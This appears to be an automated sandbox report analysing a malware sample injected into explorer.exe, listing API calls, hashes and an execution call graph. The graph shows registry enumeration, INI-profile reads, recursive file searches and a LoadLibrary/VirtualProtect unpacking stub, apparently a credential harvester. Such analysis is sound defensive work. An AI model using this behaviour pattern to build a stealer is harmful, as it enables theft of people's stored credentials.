                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _allmul$_alldvrm
                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                              • API String ID: 115548886-248832578
                                                                                                                                                                                                                              • Opcode ID: d5011df6beca27dfadc471677b6a8d5869c9d84db192c60af475272eaa218cdf
                                                                                                                                                                                                                              • Instruction ID: f41cb9656232b844aa7efccbf4cfb94f19995583d7d6cfc231739f4d0583f01e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5011df6beca27dfadc471677b6a8d5869c9d84db192c60af475272eaa218cdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35D1BBB194D7858BC7209F18888833ABBE2FF95315F05095EFAC5D6380D3B18D49DB96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID: ,$7$9
                                                                                                                                                                                                                              • API String ID: 2221118986-1653249994
                                                                                                                                                                                                                              • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                                                                                              • Instruction ID: 9557b5e6128560438bf7b7cc537480243c74872805a13733ba7feb71872abdce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF316A715083449FD335DF64D840B8BBBE9EF85340F00892EE98A97291EB719949CBA2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000,00000000,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61BCC
                                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,.exe,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61BF0
                                                                                                                                                                                                                              • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61C05
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61C1C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 1659193697-4119554291
                                                                                                                                                                                                                              • Opcode ID: 7ab0469e01b943f8eece9f9de63053fa80840d1a9ff217819b2404226fc57255
                                                                                                                                                                                                                              • Instruction ID: e0df76df8643fafdf37e3d9612ece3eadc0e10efbaf9c4786e5de6e51da747ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ab0469e01b943f8eece9f9de63053fa80840d1a9ff217819b2404226fc57255
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F0C231B50221DBE3256F39AC99BBFA3A9EF01341B25582AE14AC3350FB60CC51C799
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,00000018), ref: 02D7316F
                                                                                                                                                                                                                              • _allmul.NTDLL(-00000001,00000000,?,?), ref: 02D731D2
                                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,00000000), ref: 02D732DE
                                                                                                                                                                                                                              • _allmul.NTDLL(00000000,?,00000000), ref: 02D732E7
                                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,?,?), ref: 02D73392
                                                                                                                                                                                                                                • Part of subcall function 02D716CD: memset.NTDLL ref: 02D7172B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _allmul$_alldivmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3880648599-0
                                                                                                                                                                                                                              • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                                                                                              • Instruction ID: c7d28feaaeafc17725ac17cb7f867031ecf1ecfef23ee78697f10f2378d9abe3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79D197706083418BDB64DF29C480B6ABBE6EFC8708F14896DF99597350EB78DC45CB92
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                                                                                                                              • API String ID: 0-384346570
                                                                                                                                                                                                                              • Opcode ID: a28c4fddf4640393eed6f070d870e31f1622d588b77cff961b09226d5b8e8493
                                                                                                                                                                                                                              • Instruction ID: 6ccd01ea092a8bc147a4713787eab1d2aa21705d699c3989f58fd3e26c7e4c5f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a28c4fddf4640393eed6f070d870e31f1622d588b77cff961b09226d5b8e8493
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95D109706083009FDB14EF259490B2EBBEAEB89B54F10491EF985CB390DB74DD45DBA2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 02D696E7
                                                                                                                                                                                                                              • _alldiv.NTDLL(00000000,80000000,?,?), ref: 02D69707
                                                                                                                                                                                                                              • _alldiv.NTDLL(00000000,80000000,?,?), ref: 02D69739
                                                                                                                                                                                                                              • _alldiv.NTDLL(00000001,80000000,?,?), ref: 02D6976C
                                                                                                                                                                                                                              • _allmul.NTDLL(?,?,?,?), ref: 02D69798
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _alldiv$_allmul
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4215241517-0
                                                                                                                                                                                                                              • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                                                                                              • Instruction ID: 0679724a9b96fe5aac4916505b8b687baf5cd3c0e287c63055ef2027c91ef0c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 942123311083D56BD7349DA64CFCBFB76DACBA07A8F24092EE81193340EA728C00C5B1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,00000000), ref: 02D7B1B3
                                                                                                                                                                                                                              • _alldvrm.NTDLL(?,?,00000000), ref: 02D7B20F
                                                                                                                                                                                                                              • _allrem.NTDLL(?,00000000,?,?), ref: 02D7B28A
                                                                                                                                                                                                                              • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 02D7B298
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1484705121-0
                                                                                                                                                                                                                              • Opcode ID: fc60035512ca94d53564a0d59e4791914b8abd2c805dc3b46d8ae6f105a9118d
                                                                                                                                                                                                                              • Instruction ID: e6ae23e1eb7ff894df64059dc8d6c624d6de61394757a4a51b327e335614a001
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc60035512ca94d53564a0d59e4791914b8abd2c805dc3b46d8ae6f105a9118d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C44126756093019FC714EF25C89092ABBE6EFD8304F44892EF99597351EB34EC05CB62
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetHGlobalFromStream.COMBASE(?,?), ref: 02D618A7
                                                                                                                                                                                                                              • GlobalLock.KERNEL32(02D64B57), ref: 02D618B6
                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 02D618F4
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02D618E8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1688112647-0
                                                                                                                                                                                                                              • Opcode ID: 1d3eea9df1619cdd271a2b2d1df021bb0a3f61517507efa93dfa952533cfb9c3
                                                                                                                                                                                                                              • Instruction ID: f8dce51793aa98740257042fae55fc35153818ad79a339dacf44439f9dae4131
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d3eea9df1619cdd271a2b2d1df021bb0a3f61517507efa93dfa952533cfb9c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74016276644346EF9B025F75985C96F7BAEEF84291B10842EF559C3310DF31CD14DA60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcatlstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1475610065-0
                                                                                                                                                                                                                              • Opcode ID: 14b7473891bd061b7663e467858cc98161c6470c1520ebc87da4277071482fa3
                                                                                                                                                                                                                              • Instruction ID: 814a10de818a30ab112b93468eae0bea0b8006ce9ea60f05e5f66ef98f65000c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14b7473891bd061b7663e467858cc98161c6470c1520ebc87da4277071482fa3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24E02B6270021C5B471076AE5CD4E7B779CCEC85A1719003AFA08D3301FE52DC0486F0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D66A81: memset.NTDLL ref: 02D66A9C
                                                                                                                                                                                                                              • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 02D8F2A1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _aulldivmemset
                                                                                                                                                                                                                              • String ID: %llu$%llu
                                                                                                                                                                                                                              • API String ID: 714058258-4283164361
                                                                                                                                                                                                                              • Opcode ID: 582cecea707c541428091e3b000256e8b214c3dfb874aacfafcdf9050f751ef9
                                                                                                                                                                                                                              • Instruction ID: 216a99d4745e1eb325c906d34fc18b86c7f864950f089183eca4bbf06205ce29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 582cecea707c541428091e3b000256e8b214c3dfb874aacfafcdf9050f751ef9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0621F272A402456FD610BB24CC51FBAB75AEF81730F048628F922977C0DB21DC158AF1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,?), ref: 02D72174
                                                                                                                                                                                                                              • _allmul.NTDLL(?,?,?,00000000), ref: 02D7220E
                                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,00000000,?), ref: 02D72241
                                                                                                                                                                                                                              • _allmul.NTDLL(02D62E26,00000000,?,?), ref: 02D72295
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _allmul
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4029198491-0
                                                                                                                                                                                                                              • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                                                                                              • Instruction ID: 638eba7e10d7be720b31dd2429cf5a95611f8b17810d1a26eec62a1525d1d9e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDA158706087819FD714EF65C894A2EB7E6EF98704F00492DFA9587350EB78EC45CB52
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1297977491-0
                                                                                                                                                                                                                              • Opcode ID: 6505dd05789061f476bfd78ef2416da4926c5d939c42491e641ff5f2d62d01e7
                                                                                                                                                                                                                              • Instruction ID: d71c549234d88c95626e14842276930a2a410386783a89b61f1c5c3e6710c92b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6505dd05789061f476bfd78ef2416da4926c5d939c42491e641ff5f2d62d01e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 598147716093149FE350DF28C884A2ABBE6EF88604F444D6DF88A97351E778ED05CB92
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,00000000,02D62783), ref: 02D6192B
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,02D62783), ref: 02D61930
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02D61946
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02D6194A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcatlstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1475610065-0
                                                                                                                                                                                                                              • Opcode ID: 79813ca656f8dbe6e674b3c713d573a3de188d0cb175b922a71870b34cd405fa
                                                                                                                                                                                                                              • Instruction ID: e0be5b73bb6fb2ba4877a9e3bb1882211b134faa0bec7a13509b5fe49dce3db7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79813ca656f8dbe6e674b3c713d573a3de188d0cb175b922a71870b34cd405fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6E09B9270421C5B472176AE5C98E7B77DDCFC95A53190036F909D3301EE55DC0186F0

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:21.6%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:181
                                                                                                                                                                                                                              Total number of Limit Nodes:17
                                                                                                                                                                                                                              execution_graph 1139 1ea1af 1140 1ea1bd 1139->1140 1141 1ea298 3 API calls 1140->1141 1142 1ea1cf 1140->1142 1141->1142 941 1ea298 946 1ea29d 941->946 942 1ea385 LoadLibraryA 942->946 944 1ea3e0 VirtualProtect VirtualProtect 945 1ea46e 944->945 945->945 946->942 946->944 947 1ea3d5 946->947 996 1e3608 1001 1e3458 StrStrIW 996->1001 999 1e3458 17 API calls 1000 1e365d 999->1000 1002 1e348f 1001->1002 1013 1e350f 1001->1013 1026 1e2774 1002->1026 1004 1e3523 RegOpenKeyExW 1005 1e35e4 1004->1005 1023 1e354d 1004->1023 1006 1e1860 RtlFreeHeap 1005->1006 1009 1e35f7 1006->1009 1007 1e35b5 RegEnumKeyExW 1007->1005 1007->1023 1008 1e34a8 1010 1e3507 1008->1010 1008->1013 1039 1e28a0 1008->1039 1009->999 1012 1e1860 RtlFreeHeap 1010->1012 1012->1013 1013->1004 1015 1e2700 RtlFreeHeap 1015->1023 1016 1e34fa 1019 1e1860 RtlFreeHeap 1016->1019 1018 1e3458 14 API calls 1018->1023 1019->1010 1021 1e1860 RtlFreeHeap 1021->1023 1023->1007 1023->1015 1023->1018 1023->1021 1025 1e1860 RtlFreeHeap 1025->1016 1027 1e2797 RegOpenKeyExW 1026->1027 1028 1e2793 1026->1028 1029 1e286b 1027->1029 1030 1e27d5 RegQueryValueExW 1027->1030 1028->1027 1031 1e288d 1029->1031 1034 1e2774 RtlFreeHeap 1029->1034 1032 1e27fe 1030->1032 1033 1e285b RegCloseKey 1030->1033 1031->1008 1032->1033 1035 1e281a RegQueryValueExW 1032->1035 1033->1029 1033->1031 1034->1031 1036 1e2844 1035->1036 1037 1e2851 1035->1037 1036->1033 1038 1e1860 RtlFreeHeap 1037->1038 1038->1036 1040 1e28b9 1039->1040 1041 1e2922 1040->1041 1042 1e1860 RtlFreeHeap 1040->1042 1041->1016 1045 1e2700 1041->1045 1044 1e28df 1042->1044 1043 1e2774 5 API calls 1043->1044 1044->1041 1044->1043 1046 1e2712 1045->1046 1047 1e1860 RtlFreeHeap 1046->1047 1048 1e271d 1047->1048 1048->1016 1049 1e3254 1048->1049 1073 1e298c 1049->1073 1052 1e343a 1052->1025 1053 1e298c GetFileAttributesW 1056 1e3295 1053->1056 1054 1e342c 1082 1e30a8 1054->1082 1056->1052 1056->1054 1077 1e2938 1056->1077 1059 1e340c 1061 1e1860 RtlFreeHeap 1059->1061 1060 1e3304 GetPrivateProfileSectionNamesW 1060->1059 1071 1e331e 1060->1071 1062 1e3414 1061->1062 1063 1e1860 RtlFreeHeap 1062->1063 1064 1e341c 1063->1064 1065 1e1860 RtlFreeHeap 1064->1065 1067 1e3424 1065->1067 1066 1e334e GetPrivateProfileStringW 1068 1e3379 GetPrivateProfileIntW 1066->1068 1066->1071 1069 1e1860 RtlFreeHeap 1067->1069 1068->1071 1069->1054 1070 1e30a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1070->1071 1071->1059 1071->1066 1071->1070 1072 1e1860 RtlFreeHeap 1071->1072 1072->1071 1074 1e2999 1073->1074 1076 1e29a9 1073->1076 1075 1e299e GetFileAttributesW 1074->1075 1074->1076 1075->1076 1076->1052 1076->1053 1078 1e2980 1077->1078 1079 1e2945 1077->1079 1078->1059 1078->1060 1079->1078 1080 1e294a CreateFileW 1079->1080 1080->1078 1081 1e2972 CloseHandle 1080->1081 1081->1078 1083 1e30cc 1082->1083 1084 1e30f1 FindFirstFileW 1083->1084 1085 1e3237 1084->1085 1095 1e3117 1084->1095 1086 1e1860 RtlFreeHeap 1085->1086 1087 1e323f 1086->1087 1088 1e1860 RtlFreeHeap 1087->1088 1089 1e3247 1088->1089 1089->1052 1090 1e2700 RtlFreeHeap 1090->1095 1091 1e3210 FindNextFileW 1092 1e3226 FindClose 1091->1092 1091->1095 1092->1085 1093 1e1860 RtlFreeHeap 1093->1091 1095->1090 1095->1091 1095->1093 1096 1e30a8 RtlFreeHeap 1095->1096 1097 1e1860 RtlFreeHeap 1095->1097 1098 1e2f7c 1095->1098 1096->1095 1097->1095 1108 1e2bc0 1098->1108 1101 1e3086 1101->1095 1103 1e307e 1104 1e1860 RtlFreeHeap 1103->1104 1104->1101 1105 1e2fb6 1105->1101 1105->1103 1106 1e2e04 RtlFreeHeap 1105->1106 1107 1e1860 RtlFreeHeap 1105->1107 1106->1105 1107->1105 1109 1e2bf3 1108->1109 1110 1e2700 RtlFreeHeap 1109->1110 1111 1e2c54 1110->1111 1112 1e2a54 RtlFreeHeap 1111->1112 1113 1e2c68 1112->1113 1114 1e2c7e 1113->1114 1115 1e1860 RtlFreeHeap 1113->1115 1116 1e1860 RtlFreeHeap 1114->1116 1115->1114 1122 1e2cb2 1116->1122 1117 1e2da3 1118 1e1860 RtlFreeHeap 1117->1118 1119 1e2dd9 1118->1119 1120 1e1860 RtlFreeHeap 1119->1120 1121 1e2de1 1120->1121 1121->1101 1124 1e2a54 1121->1124 1122->1117 1123 1e1860 RtlFreeHeap 1122->1123 1123->1117 1126 1e2a86 1124->1126 1125 1e2ad9 1125->1105 1126->1125 1127 1e1860 RtlFreeHeap 1126->1127 1127->1125 1143 1e3668 1144 1e3458 17 API calls 1143->1144 1145 1e369b 1144->1145 1146 1e3458 17 API calls 1145->1146 1147 1e36bd 1146->1147 1128 1ea1f9 1129 1ea228 1128->1129 1131 1ea248 1128->1131 1132 1ea298 1129->1132 1137 1ea29d 1132->1137 1133 1ea385 LoadLibraryA 1133->1137 1135 1ea3e0 VirtualProtect VirtualProtect 1136 1ea46e 1135->1136 1136->1136 1137->1133 1137->1135 1138 1ea3d5 1137->1138 1138->1131 948 1e37f4 949 1e3804 948->949 956 1e372c 949->956 952 1e387c 954 1e3817 954->952 966 1e36c8 954->966 957 1e375a 956->957 958 1e3777 RegCreateKeyExW 957->958 959 1e37bc RegCloseKey 958->959 960 1e37cd 958->960 959->960 974 1e1860 960->974 963 1e22b4 964 1e22c8 CreateStreamOnHGlobal 963->964 965 1e22d6 963->965 964->965 965->954 967 1e36cd 966->967 972 1e371e 966->972 968 1e3716 967->968 978 1e21e4 967->978 970 1e1860 RtlFreeHeap 968->970 970->972 971 1e3706 973 1e1860 RtlFreeHeap 971->973 972->952 973->968 975 1e186e 974->975 976 1e1886 975->976 977 1e1878 RtlFreeHeap 975->977 976->952 976->963 977->976 979 1e220b 978->979 984 1e1e20 979->984 982 1e1860 RtlFreeHeap 983 1e2297 982->983 983->971 994 1e1e6d 984->994 985 1e21b5 986 1e1860 RtlFreeHeap 985->986 987 1e21cb 986->987 987->982 988 1e219b 988->985 989 1e1860 RtlFreeHeap 988->989 989->985 990 1e2177 991 1e1860 RtlFreeHeap 990->991 992 1e218e 991->992 992->988 993 1e1860 RtlFreeHeap 992->993 993->988 994->985 994->988 994->990 995 1e1860 RtlFreeHeap 994->995 995->990 1148 1ea1e0 1149 1ea1e6 1148->1149 1150 1ea298 3 API calls 1149->1150 1151 1ea248 1150->1151

                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                              callgraph 0 Function_001E971C 1 Function_001E141D 2 Function_001E2498 38 Function_001E23AC 2->38 65 Function_001E2340 2->65 3 Function_001EA298 49 Function_001EA25A 3->49 4 Function_001E2514 46 Function_001E23A0 4->46 52 Function_001E2354 4->52 59 Function_001E234C 4->59 77 Function_001E23F0 4->77 88 Function_001E2360 4->88 5 Function_001E1B14 28 Function_001E1838 5->28 6 Function_001E9912 7 Function_001E9C92 8 Function_001E2610 8->28 9 Function_001E2410 9->38 9->77 10 Function_001E1D10 10->28 69 Function_001E18F8 10->69 11 Function_001EB111 12 Function_001E188C 12->28 13 Function_001E1B8C 13->28 14 Function_001E298C 15 Function_001EB00C 16 Function_001E2688 16->28 17 Function_001E1508 18 Function_001E2308 19 Function_001E3608 50 Function_001E3458 19->50 20 Function_001E2E04 20->13 20->28 85 Function_001E1860 20->85 21 Function_001E1405 22 Function_001E4082 23 Function_001E1980 24 Function_001E1000 25 Function_001E2700 25->16 25->85 26 Function_001EB181 27 Function_001E2938 29 Function_001E1938 30 Function_001E22B4 31 Function_001E9EB4 32 Function_001E14B2 33 Function_001E38B0 33->28 33->33 53 Function_001E1AD4 33->53 34 Function_001E9930 35 Function_001EA1AF 35->3 36 Function_001E372C 36->28 36->85 37 Function_001E22AC 39 Function_001E272C 40 Function_001E30A8 40->16 40->25 40->39 40->40 68 Function_001E2F7C 40->68 70 Function_001E2AF8 40->70 40->85 41 Function_001E41A9 42 Function_001E47A7 43 Function_001E99A7 44 Function_001E1822 45 Function_001E28A0 45->28 75 Function_001E2774 45->75 45->85 47 Function_001E1E20 47->10 47->12 47->23 47->28 58 Function_001E18D0 47->58 64 Function_001E1C40 47->64 47->69 47->85 86 Function_001E1DE0 47->86 48 Function_001E9ADA 50->16 50->25 50->28 50->45 50->50 51 Function_001E3254 50->51 66 Function_001E29C0 50->66 50->75 50->85 51->14 51->16 51->27 51->28 51->39 51->40 51->85 54 Function_001E14D4 55 Function_001E1254 56 Function_001E2A54 56->28 56->85 57 Function_001EA055 60 Function_001E1A4C 61 Function_001E36C8 61->5 81 Function_001E18E8 61->81 84 Function_001E21E4 61->84 61->85 62 Function_001E4048 63 Function_001E9FC2 66->16 67 Function_001E2BC0 67->8 67->16 67->25 67->28 67->29 67->39 67->56 67->85 68->20 68->56 68->67 71 Function_001E2EF8 68->71 68->85 70->28 71->8 72 Function_001E14F9 73 Function_001EA1F9 73->3 74 Function_001E1576 75->28 75->75 75->85 76 Function_001E37F4 76->18 76->30 76->36 76->37 76->52 76->61 78 Function_001E2570 76->78 80 Function_001E2B6C 76->80 82 Function_001E22E8 76->82 77->38 78->28 78->46 78->52 79 Function_001E156C 80->2 80->4 83 Function_001E3668 83->50 84->28 84->47 84->85 85->53 86->60 87 Function_001E1560 89 Function_001EA1E0 89->3

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
